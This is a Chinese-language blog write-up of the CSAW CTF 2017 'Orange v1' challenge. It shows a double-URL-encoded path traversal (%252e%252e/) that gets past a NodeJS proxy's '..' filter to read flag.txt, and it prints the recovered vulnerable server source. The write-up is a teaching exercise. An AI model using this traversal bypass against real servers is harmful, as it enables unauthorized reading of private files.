Chybeta

CSAW CTF 2017-Orange v1-writeup

CSAW CTF 2017-Orange v1-writeup
文件读取漏洞

Task

1
2
3
I wrote a little proxy program in NodeJS for my poems folder.
Everyone wants to read flag.txt but I like it too much to share.
http://web.chal.csaw.io:7311/?path=orange.txt

Solution

若将path参数放空,即 http://web.chal.csaw.io:7311/?path=

没有flag.txt,所以需要想办法“遍历”一下目录。

尝试访问: http://web.chal.csaw.io:7311/?path=../

考虑到可能有二次编码的问题,. => %2e => %252e,访问:http://web.chal.csaw.io:7311/?path=%252e%252e/

最后访问: http://web.chal.csaw.io:7311/?path=%252e%252e/flag.txt

读取到一些源文件,如下:

back.py:

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/usr/bin/python
import SimpleHTTPServer
import SocketServer
PORT = 8080
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "Serving at port", PORT
httpd.serve_forever()

serve.sh:

1
2
3
4
#!/usr/bin/env bash
python back.py &
nodejs server.js

server.js:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
var http = require('http');
var fs = require('fs');
var url = require('url');
var server = http.createServer(function(req, res) {
try {
var path = url.parse(req.url, true).query;
path = path['path'];
if (path.indexOf("..") == -1 && path.indexOf("NN") == -1) {
var base = "http://localhost:8080/poems/";
var callback = function(response){
var str = '';
response.on('data', function (chunk) {
str += chunk;
});
response.on('end', function () {
res.end(str);
});
}
http.get(base + path, callback).end();
} else {
res.writeHead(403);
res.end("WHOA THATS BANNED!!!!");
}
}
catch (e) {
res.writeHead(404);
res.end('Oops');
}
});
server.listen(9999);

点击赞赏二维码,您的支持将鼓励我继续创作!
chybeta WeChat Pay

微信打赏

chybeta Alipay

支付宝打赏

本文标题:CSAW CTF 2017-Orange v1-writeup

文章作者:chybeta

发布时间:2017年09月18日 - 13:09

最后更新:2017年09月19日 - 23:09

原始链接:http://chybeta.github.io/2017/09/18/CSAW-CTF-2017-Orange-v1-writeup/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。